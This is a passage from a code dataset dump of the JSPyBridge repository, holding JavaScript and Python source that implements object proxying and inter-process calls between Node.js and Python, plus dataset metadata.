Promise<any>\n\t\tread_text$($: {}): Promise<any>\n\t\tread_bytes(): Promise<any>\n\t\tread_bytes$($: {}): Promise<any>\n\t\tis_dir(): Promise<any>\n\t\tis_dir$($: {}): Promise<any>\n\t\tis_file(): Promise<any>\n\t\tis_file$($: {}): Promise<any>\n\t\texists(): Promise<any>\n\t\texists$($: {}): Promise<any>\n\t\titerdir(): Promise<any>\n\t\titerdir$($: {}): Promise<any>\n\t\tjoinpath(): Promise<any>\n\t\tjoinpath$($: {}): Promise<any>\n\t\tparent(): Promise<any>\n\t\tparent$($: {}): Promise<any>\n\t}\n\tlet crc32: Promise<any>\n\tlet error: Promise<any>\n\tlet BadZipfile: Promise<any>\n\tlet ZIP64_LIMIT: Promise<any>\n\tlet ZIP_FILECOUNT_LIMIT: Promise<any>\n\tlet ZIP_MAX_COMMENT: Promise<any>\n\tlet ZIP_STORED: Promise<any>\n\tlet ZIP_DEFLATED: Promise<any>\n\tlet ZIP_BZIP2: Promise<any>\n\tlet ZIP_LZMA: Promise<any>\n\tlet DEFAULT_VERSION: Promise<any>\n\tlet ZIP64_VERSION: Promise<any>\n\tlet BZIP2_VERSION: Promise<any>\n\tlet LZMA_VERSION: Promise<any>\n\tlet MAX_EXTRACT_VERSION: Promise<any>\n\tlet structEndArchive: Promise<any>\n\tlet stringEndArchive: Promise<any>\n\tlet sizeEndCentDir: Promise<any>\n\tlet structCentralDir: Promise<any>\n\tlet stringCentralDir: Promise<any>\n\tlet sizeCentralDir: Promise<any>\n\tlet structFileHeader: Promise<any>\n\tlet stringFileHeader: Promise<any>\n\tlet sizeFileHeader: Promise<any>\n\tlet structEndArchive64Locator: Promise<any>\n\tlet stringEndArchive64Locator: Promise<any>\n\tlet sizeEndCentDir64Locator: Promise<any>\n\tlet structEndArchive64: Promise<any>\n\tlet stringEndArchive64: Promise<any>\n\tlet sizeEndCentDir64: Promise<any>\n\tlet compressor_names: Promise<any>\n}\ntype PyObjectType<T> =\n\tT extends \"astexport\" ? typeof astexport :\n\tT extends \"base64\" ? typeof base64 :\n\tT extends \"codecs\" ? typeof codecs :\n\tT extends \"colorsys\" ? typeof colorsys :\n\tT extends \"crypt\" ? typeof crypt :\n\tT extends \"decimal\" ? typeof decimal :\n\tT extends \"email.base64mime\" ? typeof email.base64mime :\n\tT extends \"encodings.base64_codec\" ? typeof encodings.base64_codec :\n\tT extends \"encodings.bz2_codec\" ? typeof encodings.bz2_codec :\n\tT extends \"encodings.hex_codec\" ? typeof encodings.hex_codec :\n\tT extends \"encodings.palmos\" ? typeof encodings.palmos :\n\tT extends \"encodings.quopri_codec\" ? typeof encodings.quopri_codec :\n\tT extends \"encodings.uu_codec\" ? typeof encodings.uu_codec :\n\tT extends \"encodings.zlib_codec\" ? typeof encodings.zlib_codec :\n\tT extends \"export\" ? typeof export :\n\tT extends \"gzip\" ? typeof gzip :\n\tT extends \"hashlib\" ? typeof hashlib :\n\tT extends \"idlelib.codecontext\" ? typeof idlelib.codecontext :\n\tT extends \"idlelib.statusbar\" ? typeof idlelib.statusbar :\n\tT extends \"os\" ? typeof os :\n\tT extends \"platform\" ? typeof platform :\n\tT extends \"pstats\" ? typeof pstats :\n\tT extends \"signal\" ? typeof signal :\n\tT extends \"socket\" ? typeof socket :\n\tT extends \"socketserver\" ? typeof socketserver :\n\tT extends \"sqlite3.dbapi2\" ? typeof sqlite3.dbapi2 :\n\tT extends \"sqlite3.dump\" ? typeof sqlite3.dump :\n\tT extends \"stat\" ? typeof stat :\n\tT extends \"statistics\" ? typeof statistics :\n\tT extends \"tarfile\" ? typeof tarfile :\n\tT extends \"threading\" ? typeof threading :\n\tT extends \"tkinter.colorchooser\" ? typeof tkinter.colorchooser :\n\tT extends \"tkinter.commondialog\" ? typeof tkinter.commondialog :\n\tT extends \"tkinter.constants\" ? typeof tkinter.constants :\n\tT extends \"tkinter.dialog\" ? typeof tkinter.dialog :\n\tT extends \"tkinter.dnd\" ? typeof tkinter.dnd :\n\tT extends \"tkinter.filedialog\" ? typeof tkinter.filedialog :\n\tT extends \"tkinter.font\" ? typeof tkinter.font :\n\tT extends \"tkinter.messagebox\" ? typeof tkinter.messagebox :\n\tT extends \"tkinter.scrolledtext\" ? typeof tkinter.scrolledtext :\n\tT extends \"tkinter.simpledialog\" ? typeof tkinter.simpledialog :\n\tT extends \"tkinter.tix\" ? typeof tkinter.tix :\n\tT extends \"tkinter.ttk\" ? typeof tkinter.ttk :\n\tT extends \"turtledemo.chaos\" ? typeof turtledemo.chaos :\n\tT extends \"uuid\" ? typeof uuid :\n\tT extends \"zipfile\" ? typeof zipfile :\n\tT extends \"sqlite3\" ? typeof sqlite3 :\n\tT extends \"tkinter\" ? typeof tkinter : object;\ntype PyTypeName =\n\t\"astexport\" | \"base64\" | \"codecs\" | \"colorsys\" | \"crypt\" | \"decimal\" | \"email.base64mime\" | \"encodings.base64_codec\" | \"encodings.bz2_codec\" | \"encodings.hex_codec\" | \"encodings.palmos\" | \"encodings.quopri_codec\" | \"encodings.uu_codec\" | \"encodings.zlib_codec\" | \"export\" | \"gzip\" | \"hashlib\" | \"idlelib.codecontext\" | \"idlelib.statusbar\" | \"os\" | \"platform\" | \"pstats\" | \"signal\" | \"socket\" | \"socketserver\" | \"sqlite3.dbapi2\" | \"sqlite3.dump\" | \"stat\" | \"statistics\" | \"tarfile\" | \"threading\" | \"tkinter.colorchooser\" | \"tkinter.commondialog\" | \"tkinter.constants\" | \"tkinter.dialog\" | \"tkinter.dnd\" | \"tkinter.filedialog\" | \"tkinter.font\" | \"tkinter.messagebox\" | \"tkinter.scrolledtext\" | \"tkinter.simpledialog\" | \"tkinter.tix\" | \"tkinter.ttk\" | \"turtledemo.chaos\" | \"uuid\" | \"zipfile\" | \"sqlite3\" | \"tkinter\";" }, { "alpha_fraction": 0.5750069618225098, "alphanum_fraction": 0.5776143074035645, "avg_line_length": 32.98417663574219, "blob_id": "4694d71c325df7be70ec4ae6371b20216821ede9", "content_id": "709f98c24f5a436c7dee7b3a5098e61591b73463", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 10739, "license_type": "permissive", "max_line_length": 139, "num_lines": 316, "path": "/src/javascript/js/pyi.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "/**\n * The Python Interface for JavaScript\n */\n\nconst util = require('util')\nif (typeof performance === 'undefined') var { performance } = require('perf_hooks')\nconst log = () => { }\nconst errors = require('./errors')\nconst REQ_TIMEOUT = 100000\n\nclass BridgeException extends Error {\n constructor (...a) {\n super(...a)\n this.message += ` Python didn't respond in time (${REQ_TIMEOUT}ms), look above for any Python errors. If no errors, the API call hung.`\n // We'll fix the stack trace once this is shipped.\n }\n}\n\nclass PythonException extends Error {\n constructor (stack, error) {\n super()\n const failedCall = stack.join('.')\n const trace = this.stack.split('\\n').slice(1).join('\\n')\n\n // Stack is generated at runtime when (and if) the error is printed\n Object.defineProperty(this, 'stack', {\n get: () => errors.getErrorMessage(failedCall, trace, error || this.pytrace)\n })\n }\n\n setPythonTrace (value) {\n // When the exception is thrown, we don't want this to be printed out.\n // We could also use new class \"hard-privates\"\n Object.defineProperty(this, 'pytrace', { enumerable: false, value })\n }\n}\n\nasync function waitFor (cb, withTimeout, onTimeout) {\n let t\n if (withTimeout === Infinity) return new Promise(resolve => cb(resolve))\n const ret = await Promise.race([\n new Promise(resolve => cb(resolve)),\n new Promise(resolve => { t = setTimeout(() => resolve('timeout'), withTimeout) })\n ])\n clearTimeout(t)\n if (ret === 'timeout') onTimeout()\n return ret\n}\n\nlet nextReqId = 10000\nconst nextReq = () => nextReqId++\n\nclass PyBridge {\n constructor (com, jsi) {\n this.com = com\n // This is a ref map used so Python can call back JS APIs\n this.jrefs = {}\n this.jsi = jsi\n\n // We don't want to GC things individually, so batch all the GCs at once\n // to Python\n this.freeable = []\n this.loop = setInterval(this.runTasks, 1000)\n\n // This is called on GC\n this.finalizer = new FinalizationRegistry(ffid => {\n this.freeable.push(ffid)\n // Once the Proxy is freed, we also want to release the pyClass ref\n delete this.jsi.m[ffid]\n })\n\n globalThis.JSPyBridge = {\n python: this.makePyObject(0).python\n }\n }\n\n runTasks = () => {\n if (this.freeable.length) this.free(this.freeable)\n this.freeable = []\n }\n\n end () {\n clearInterval(this.loop)\n }\n\n request (req, cb) {\n // When we call Python functions with Proxy paramaters, we need to just send the FFID\n // so it can be mapped on the python side.\n req.c = 'pyi'\n this.com.write(req, cb)\n }\n\n async len (ffid, stack) {\n const req = { r: nextReq(), action: 'length', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async get (ffid, stack, args, suppressErrors) {\n const req = { r: nextReq(), action: 'get', ffid: ffid, key: stack, val: args }\n\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') {\n if (suppressErrors) return undefined\n throw new PythonException(stack, resp.sig)\n }\n switch (resp.key) {\n case 'string':\n case 'int':\n return resp.val // Primitives don't need wrapping\n default: {\n const py = this.makePyObject(resp.val, resp.sig)\n this.queueForCollection(resp.val, py)\n return py\n }\n }\n }\n\n // This does a function call to Python. We assign the FFIDs, so we can assign them and send the call to Python.\n // We also need to keep track of the Python objects so we can GC them.\n async call (ffid, stack, args, kwargs, set, timeout) {\n const r = nextReq()\n const req = { r, c: 'pyi', action: set ? 'setval' : 'pcall', ffid: ffid, key: stack, val: [args, kwargs] }\n const payload = JSON.stringify(req, (k, v) => {\n if (!k) return v\n if (v && !v.r) {\n if (v.ffid) return { ffid: v.ffid }\n if (\n typeof v === 'function' ||\n (typeof v === 'object' && (v.constructor.name !== 'Object' && v.constructor.name !== 'Array'))\n ) {\n const ffid = ++this.jsi.ffid\n this.jsi.m[ffid] = v\n this.queueForCollection(ffid, v)\n return { ffid }\n }\n }\n return v\n })\n\n const stacktrace = new PythonException(stack)\n\n const resp = await waitFor(resolve => this.com.writeRaw(payload, r, resolve), timeout || REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') {\n stacktrace.setPythonTrace(resp.sig)\n throw stacktrace\n }\n\n if (set) {\n return true // Do not allocate new FFID if setting\n }\n\n log('call', ffid, stack, args, resp)\n switch (resp.key) {\n case 'string':\n case 'int':\n return resp.val // Primitives don't need wrapping\n default: {\n const py = this.makePyObject(resp.val, resp.sig)\n this.queueForCollection(resp.val, py)\n return py\n }\n }\n }\n\n async value (ffid, stack) {\n const req = { r: nextReq(), action: 'value', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async inspect (ffid, stack) {\n const req = { r: nextReq(), action: 'inspect', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async free (ffids) {\n const req = { r: nextReq(), action: 'free', ffid: '', key: '', val: ffids }\n this.request(req)\n return true\n }\n\n queueForCollection (ffid, val) {\n this.finalizer.register(val, ffid)\n }\n\n makePyObject (ffid, inspectString) {\n const self = this\n // \"Intermediate\" objects are returned while chaining. If the user tries to log\n // an Intermediate then we know they forgot to use await, as if they were to use\n // await, then() would be implicitly called where we wouldn't return a Proxy, but\n // a Promise. Must extend Function to be a \"callable\" object in JS for the Proxy.\n class Intermediate extends Function {\n constructor (callstack) {\n super()\n this.callstack = [...callstack]\n }\n\n [util.inspect.custom] () {\n return '\\n[You must use await when calling a Python API]\\n'\n }\n }\n const handler = {\n get: (target, prop, reciever) => {\n const next = new Intermediate(target.callstack)\n // log('```prop', next.callstack, prop)\n if (prop === '$$') return target\n if (prop === 'ffid') return ffid\n if (prop === 'toJSON') return () => ({ ffid })\n if (prop === 'toString' && inspectString) return target[prop]\n if (prop === 'then') {\n // Avoid .then loops\n if (!next.callstack.length) {\n return undefined\n }\n return (resolve, reject) => {\n this.get(ffid, next.callstack, []).then(resolve).catch(reject)\n next.callstack = [] // Empty the callstack afer running fn\n }\n }\n if (prop === 'length') return this.len(ffid, next.callstack, [])\n if (typeof prop === 'symbol') {\n if (prop === Symbol.iterator) {\n // This is just for destructuring arrays\n return function *iter () {\n for (let i = 0; i < 100; i++) {\n const next = new Intermediate([...target.callstack, i])\n yield new Proxy(next, handler)\n }\n throw SyntaxError('You must use `for await` when iterating over a Python object in a for-of loop')\n }\n }\n if (prop === Symbol.asyncIterator) {\n return async function *iter () {\n const it = await self.call(0, ['Iterate'], [{ ffid }])\n while (true) {\n const val = await it.Next()\n if (val === '$$STOPITER') {\n return\n } else {\n yield val\n }\n }\n }\n }\n log('Get symbol', next.callstack, prop)\n return\n }\n if (Number.isInteger(parseInt(prop))) prop = parseInt(prop)\n next.callstack.push(prop)\n return new Proxy(next, handler) // no $ and not fn call, continue chaining\n },\n apply: (target, self, args) => { // Called for function call\n const final = target.callstack[target.callstack.length - 1]\n let kwargs, timeout\n if (final === 'apply') {\n target.callstack.pop()\n args = [args[0], ...args[1]]\n } else if (final === 'call') {\n target.callstack.pop()\n } else if (final?.endsWith('$')) {\n kwargs = args.pop()\n timeout = kwargs.$timeout\n delete kwargs.$timeout\n target.callstack[target.callstack.length - 1] = final.slice(0, -1)\n } else if (final === 'valueOf') {\n target.callstack.pop()\n const ret = this.value(ffid, [...target.callstack])\n return ret\n } else if (final === 'toString') {\n target.callstack.pop()\n const ret = this.inspect(ffid, [...target.callstack])\n return ret\n }\n const ret = this.call(ffid, target.callstack, args, kwargs, false, timeout)\n target.callstack = [] // Flush callstack to py\n return ret\n },\n set: (target, prop, val) => {\n if (Number.isInteger(parseInt(prop))) prop = parseInt(prop)\n const ret = this.call(ffid, [...target.callstack], [prop, val], {}, true)\n return ret\n }\n }\n // A CustomLogger is just here to allow the user to console.log Python objects\n // since this must be sync, we need to call inspect in Python along with every CALL or GET\n // operation, which does bring some small overhead.\n class CustomLogger extends Function {\n constructor () {\n super()\n this.callstack = []\n }\n\n [util.inspect.custom] () {\n return inspectString || '(Some Python object)'\n }\n }\n return new Proxy(new CustomLogger(), handler)\n }\n}\n\nmodule.exports = { PyBridge }\n" }, { "alpha_fraction": 0.5570513010025024, "alphanum_fraction": 0.5591346025466919, "avg_line_length": 30.515151977539062, "blob_id": "474c5d726dafa988b9241045e208a6d675664061", "content_id": "f97a4c0c934ca71c787d824bb2b38b276b866d56", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 6240, "license_type": "permissive", "max_line_length": 97, "num_lines": 198, "path": "/src/pythonia/jsi.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "/**\n * The JavaScript Interface for Python\n */\nconst util = require('util')\n\nconst debug = process.env.DEBUG?.includes('jspybridge') ? console.debug : () => { }\nconst colors = process.env.FORCE_COLOR !== '0'\n\nfunction getType (obj) {\n if (obj?.ffid) return 'py'\n if (typeof obj === 'function') {\n // Some tricks to check if we have a function, class or object\n if (obj.prototype) {\n // SO ... we COULD automatically call new for ES5 functions, but this gets complicated.\n // Since old ES5 classes can be called both with and without new, but with different\n // behavior. By forcing the new operator, we can no longer access ES5 classes variables\n // because of lack of support in proxy.py for functions with variables inside.. So instead\n // just don't call `new` for non-ES6 classes and let the user use the .new() psuedomethod.\n // The below could would check if the prototype has functions in it and assume class if so.\n // const props = Object.getOwnPropertyNames(obj.prototype)\n // if (props.length > 1) return 'class'\n // The below code just checks to see if we have an ES6 class (non-writable)\n const desc = Object.getOwnPropertyDescriptor(obj, 'prototype')\n if (!desc.writable) return 'class'\n }\n\n return 'fn'\n }\n if (typeof obj === 'bigint') return 'big'\n if (typeof obj === 'object') return 'obj'\n if (!isNaN(obj)) return 'num'\n if (typeof obj === 'string') return 'string'\n}\n\nclass JSBridge {\n constructor (ipc, pyi) {\n // This is an ID that increments each time a new object is returned\n // to Python.\n this.ffid = 10000\n this.pyi = pyi\n // This contains a refrence map of FFIDs to JS objects.\n // TODO: figure out gc, maybe weakmaps\n this.m = {\n 0: {\n console,\n require,\n globalThis\n }\n }\n this.ipc = ipc\n this.eventMap = {}\n\n // ipc.on('message', this.onMessage)\n }\n\n addWeakRef (object, ffid) {\n const weak = new WeakRef(object)\n Object.defineProperty(this.m, ffid, {\n get () {\n return weak.deref()\n }\n })\n }\n\n async get (r, ffid, attr) {\n try {\n var v = await this.m[ffid][attr]\n var type = v.ffid ? 'py' : getType(v)\n } catch (e) {\n return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n\n switch (type) {\n case 'string': return this.ipc.send({ r, key: 'string', val: v })\n case 'big': return this.ipc.send({ r, key: 'big', val: Number(v) })\n case 'num': return this.ipc.send({ r, key: 'num', val: v })\n case 'py': return this.ipc.send({ r, key: 'py', val: v.ffid })\n case 'class':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'class', val: this.ffid })\n case 'fn':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'fn', val: this.ffid })\n case 'obj':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'obj', val: this.ffid })\n default: return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n }\n\n set (r, ffid, attr, [val]) {\n try {\n this.m[ffid][attr] = val\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n this.ipc.send({ r, key: '', val: true })\n }\n\n // Call property with new keyword to construct classes\n init (r, ffid, attr, args) {\n // console.log('init', r, ffid, attr, args)\n this.m[++this.ffid] = attr ? new this.m[ffid][attr](...args) : new this.m[ffid](...args)\n this.ipc.send({ r, key: 'inst', val: this.ffid })\n }\n\n // Call function with async keyword (also works with sync funcs)\n async call (r, ffid, attr, args) {\n try {\n if (attr) {\n var v = await this.m[ffid][attr].apply(this.m[ffid], args) // eslint-disable-line\n } else {\n var v = await this.m[ffid](...args) // eslint-disable-line\n }\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n const type = getType(v)\n // console.log('GetType', type, v)\n switch (type) {\n case 'string': return this.ipc.send({ r, key: 'string', val: v })\n case 'big': return this.ipc.send({ r, key: 'big', val: Number(v) })\n case 'num': return this.ipc.send({ r, key: 'num', val: v })\n case 'py': return this.ipc.send({ r, key: 'py', val: v.ffid })\n case 'class':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'class', val: this.ffid })\n case 'fn':\n // Fix for functions that return functions, use .call() wrapper\n // this.m[++this.ffid] = { call: v }\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'fn', val: this.ffid })\n case 'obj':\n this.m[++this.ffid] = v\n return this.ipc.send({ r, key: 'obj', val: this.ffid })\n default: return this.ipc.send({ r, key: 'void', val: this.ffid })\n }\n }\n\n // called for debug in JS, print() in python via __str__\n async inspect (r, ffid) {\n const s = util.inspect(await this.m[ffid], { colors })\n this.ipc.send({ r, val: s })\n }\n\n // for __dict__ in python (used in json.dumps)\n async serialize (r, ffid) {\n const v = await this.m[ffid]\n this.ipc.send({ r, val: v.valueOf() })\n }\n\n async keys (r, ffid) {\n const v = await this.m[ffid]\n const keys = Object.getOwnPropertyNames(v)\n this.ipc.send({ r, keys })\n }\n\n free (r, ffid, attr, args) {\n for (const id of args) {\n delete this.m[id]\n }\n }\n\n process (r, args) {\n const parse = input => {\n if (typeof input !== 'object') return\n for (const k in input) {\n const v = input[k]\n if (v && typeof v === 'object') {\n if (v.ffid) {\n const proxy = this.pyi.makePyObject(v.ffid)\n this.m[v.ffid] = proxy\n input[k] = proxy\n } else {\n parse(v)\n }\n } else {\n parse(v)\n }\n }\n }\n parse(args)\n }\n\n async onMessage ({ r, action, p, ffid, key, args }) {\n // console.debug('onMessage!', arguments, r, action)\n try {\n if (p) {\n this.process(r, args)\n }\n await this[action](r, ffid, key, args)\n } catch (e) {\n return this.ipc.send({ r, key: 'error', error: e.stack })\n }\n }\n}\n\nmodule.exports = { JSBridge }\n" }, { "alpha_fraction": 0.5471007823944092, "alphanum_fraction": 0.5501970648765564, "avg_line_length": 37.20071792602539, "blob_id": "c37fecb9374ccf17de08e2a3db9acacc2dd563e3", "content_id": "21d80548c1d8bc7652b0aad44634d0c83e455983", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10658, "license_type": "permissive", "max_line_length": 110, "num_lines": 279, "path": "/src/javascript/proxy.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import time, threading, json, sys, os, traceback\nfrom . import config, json_patch\nfrom .errors import JavaScriptError\n\ndebug = config.debug\n\n# This is the Executor, something that sits in the middle of the Bridge and is the interface for\n# Python to JavaScript. This is also used by the bridge to call Python from Node.js.\nclass Executor:\n def __init__(self, loop):\n self.loop = loop\n loop.pyi.executor = self\n self.queue = loop.queue_request\n self.i = 0\n self.bridge = self.loop.pyi\n\n def ipc(self, action, ffid, attr, args=None):\n self.i += 1\n r = self.i # unique request ts, acts as ID for response\n l = None # the lock\n if action == \"get\": # return obj[prop]\n l = self.queue(r, {\"r\": r, \"action\": \"get\", \"ffid\": ffid, \"key\": attr})\n if action == \"init\": # return new obj[prop]\n l = self.queue(r, {\"r\": r, \"action\": \"init\", \"ffid\": ffid, \"key\": attr, \"args\": args})\n if action == \"inspect\": # return require('util').inspect(obj[prop])\n l = self.queue(r, {\"r\": r, \"action\": \"inspect\", \"ffid\": ffid, \"key\": attr})\n if action == \"serialize\": # return JSON.stringify(obj[prop])\n l = self.queue(r, {\"r\": r, \"action\": \"serialize\", \"ffid\": ffid})\n if action == \"set\":\n l = self.queue(r, {\"r\": r, \"action\": \"set\", \"ffid\": ffid, \"key\": attr, \"args\": args})\n if action == \"keys\":\n l = self.queue(r, {\"r\": r, \"action\": \"keys\", \"ffid\": ffid})\n\n if not l.wait(10):\n if not config.event_thread:\n print(config.dead)\n print(\"Timed out\", action, ffid, attr, repr(config.event_thread))\n raise Exception(f\"Timed out accessing '{attr}'\")\n res, barrier = self.loop.responses[r]\n del self.loop.responses[r]\n barrier.wait()\n if \"error\" in res:\n raise JavaScriptError(attr, res[\"error\"])\n return res\n\n # forceRefs=True means that the non-primitives in the second parameter will not be recursively\n # parsed for references. It's specifcally for eval_js.\n def pcall(self, ffid, action, attr, args, *, timeout=1000, forceRefs=False):\n \"\"\"\n This function does a two-part call to JavaScript. First, a preliminary request is made to JS\n with the function ID, attribute and arguments that Python would like to call. For each of the\n non-primitive objects in the arguments, in the preliminary request we \"request\" an FFID from JS\n which is the authoritative side for FFIDs. Only it may assign them; we must request them. Once\n JS recieves the pcall, it searches the arguments and assigns FFIDs for everything, then returns\n the IDs in a response. We use these IDs to store the non-primitive values into our ref map.\n On the JS side, it creates Proxy classes for each of the requests in the pcall, once they get\n destroyed, a free call is sent to Python where the ref is removed from our ref map to allow for\n normal GC by Python. Finally, on the JS side it executes the function call without waiting for\n Python. A init/set operation on a JS object also uses pcall as the semantics are the same.\n \"\"\"\n wanted = {}\n self.ctr = 0\n callRespId, ffidRespId = self.i + 1, self.i + 2\n self.i += 2\n self.expectReply = False\n # p=1 means we expect a reply back, not used at the meoment, but\n # in the future as an optimization we could skip the wait if not needed\n packet = {\"r\": callRespId, \"action\": action, \"ffid\": ffid, \"key\": attr, \"args\": args}\n\n def ser(arg):\n if hasattr(arg, \"ffid\"):\n self.ctr += 1\n return {\"ffid\": arg.ffid}\n else:\n # Anything we don't know how to serialize -- exotic or not -- treat it as an object\n self.ctr += 1\n self.expectReply = True\n wanted[self.ctr] = arg\n return {\"r\": self.ctr, \"ffid\": \"\"}\n\n if forceRefs:\n _block, _locals = args\n packet[\"args\"] = [args[0], {}]\n flocals = packet[\"args\"][1]\n for k in _locals:\n v = _locals[k]\n if (\n (type(v) is int)\n or (type(v) is float)\n or (v is None)\n or (v is True)\n or (v is False)\n ):\n flocals[k] = v\n else:\n flocals[k] = ser(v)\n packet[\"p\"] = self.ctr\n payload = json.dumps(packet)\n else:\n payload = json.dumps(packet, default=ser)\n # a bit of a perf hack, but we need to add in the counter after we've already serialized ...\n payload = payload[:-1] + f',\"p\":{self.ctr}}}'\n\n l = self.loop.queue_request(callRespId, payload)\n # We only have to wait for a FFID assignment response if\n # we actually sent any non-primitives, otherwise skip\n if self.expectReply:\n l2 = self.loop.await_response(ffidRespId)\n if not l2.wait(timeout):\n raise Exception(\"Execution timed out\")\n pre, barrier = self.loop.responses[ffidRespId]\n del self.loop.responses[ffidRespId]\n\n if \"error\" in pre:\n raise JavaScriptError(attr, res[\"error\"])\n\n for requestId in pre[\"val\"]:\n ffid = pre[\"val\"][requestId]\n self.bridge.m[ffid] = wanted[int(requestId)]\n # This logic just for Event Emitters\n try:\n if hasattr(self.bridge.m[ffid], \"__call__\"):\n setattr(self.bridge.m[ffid], \"iffid\", ffid)\n except Exception:\n pass\n\n barrier.wait()\n\n if not l.wait(timeout):\n if not config.event_thread:\n print(config.dead)\n raise Exception(\n f\"Call to '{attr}' timed out. Increase the timeout by setting the `timeout` keyword argument.\"\n )\n res, barrier = self.loop.responses[callRespId]\n del self.loop.responses[callRespId]\n\n barrier.wait()\n\n if \"error\" in res:\n raise JavaScriptError(attr, res[\"error\"])\n return res[\"key\"], res[\"val\"]\n\n def getProp(self, ffid, method):\n resp = self.ipc(\"get\", ffid, method)\n return resp[\"key\"], resp[\"val\"]\n\n def setProp(self, ffid, method, val):\n self.pcall(ffid, \"set\", method, [val])\n return True\n\n def callProp(self, ffid, method, args, *, timeout=None, forceRefs=False):\n resp = self.pcall(ffid, \"call\", method, args, timeout=timeout, forceRefs=forceRefs)\n return resp\n\n def initProp(self, ffid, method, args):\n resp = self.pcall(ffid, \"init\", method, args)\n return resp\n\n def inspect(self, ffid, mode):\n resp = self.ipc(\"inspect\", ffid, mode)\n return resp[\"val\"]\n\n def keys(self, ffid):\n return self.ipc(\"keys\", ffid, \"\")[\"keys\"]\n\n def free(self, ffid):\n self.loop.freeable.append(ffid)\n\n def get(self, ffid):\n return self.bridge.m[ffid]\n\n\nINTERNAL_VARS = [\"ffid\", \"_ix\", \"_exe\", \"_pffid\", \"_pname\", \"_es6\", \"_resolved\", \"_Keys\"]\n\n# \"Proxy\" classes get individually instanciated for every thread and JS object\n# that exists. It interacts with an Executor to communicate.\nclass Proxy(object):\n def __init__(self, exe, ffid, prop_ffid=None, prop_name=\"\", es6=False):\n self.ffid = ffid\n self._exe = exe\n self._ix = 0\n #\n self._pffid = prop_ffid if (prop_ffid != None) else ffid\n self._pname = prop_name\n self._es6 = es6\n self._resolved = {}\n self._Keys = None\n\n def _call(self, method, methodType, val):\n this = self\n\n debug(\"MT\", method, methodType, val)\n if methodType == \"fn\":\n return Proxy(self._exe, val, self.ffid, method)\n if methodType == \"class\":\n return Proxy(self._exe, val, es6=True)\n if methodType == \"obj\":\n return Proxy(self._exe, val)\n if methodType == \"inst\":\n return Proxy(self._exe, val)\n if methodType == \"void\":\n return None\n if methodType == \"py\":\n return self._exe.get(val)\n else:\n return val\n\n def __call__(self, *args, timeout=10, forceRefs=False):\n mT, v = (\n self._exe.initProp(self._pffid, self._pname, args)\n if self._es6\n else self._exe.callProp(\n self._pffid, self._pname, args, timeout=timeout, forceRefs=forceRefs\n )\n )\n if mT == \"fn\":\n return Proxy(self._exe, v)\n return self._call(self._pname, mT, v)\n\n def __getattr__(self, attr):\n # Special handling for new keyword for ES5 classes\n if attr == \"new\":\n return self._call(self._pname if self._pffid == self.ffid else \"\", \"class\", self._pffid)\n methodType, val = self._exe.getProp(self._pffid, attr)\n return self._call(attr, methodType, val)\n\n def __getitem__(self, attr):\n methodType, val = self._exe.getProp(self.ffid, attr)\n return self._call(attr, methodType, val)\n\n def __iter__(self):\n self._ix = 0\n if self.length == None:\n self._Keys = self._exe.keys(self.ffid)\n return self\n\n def __next__(self):\n if self._Keys:\n if self._ix < len(self._Keys):\n result = self._Keys[self._ix]\n self._ix += 1\n return result\n else:\n raise StopIteration\n elif self._ix < self.length:\n result = self[self._ix]\n self._ix += 1\n return result\n else:\n raise StopIteration\n\n def __setattr__(self, name, value):\n if name in INTERNAL_VARS:\n object.__setattr__(self, name, value)\n else:\n return self._exe.setProp(self.ffid, name, value)\n\n def __setitem__(self, name, value):\n return self._exe.setProp(self.ffid, name, value)\n\n def __contains__(self, key):\n return True if self[key] is not None else False\n\n def valueOf(self):\n ser = self._exe.ipc(\"serialize\", self.ffid, \"\")\n return ser[\"val\"]\n\n def __str__(self):\n return self._exe.inspect(self.ffid, \"str\")\n\n def __repr__(self):\n return self._exe.inspect(self.ffid, \"repr\")\n\n def __json__(self):\n return {\"ffid\": self.ffid}\n\n def __del__(self):\n self._exe.free(self.ffid)\n" }, { "alpha_fraction": 0.7853692173957825, "alphanum_fraction": 0.7860593795776367, "avg_line_length": 62.043479919433594, "blob_id": "55a2265b4da67f63df05da384d5461e72e7744f4", "content_id": "ab823d52d88a036ae1e00430aafeee3c9ee0bc20", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1449, "license_type": "permissive", "max_line_length": 98, "num_lines": 23, "path": "/docs/internal.md", "repo_name": 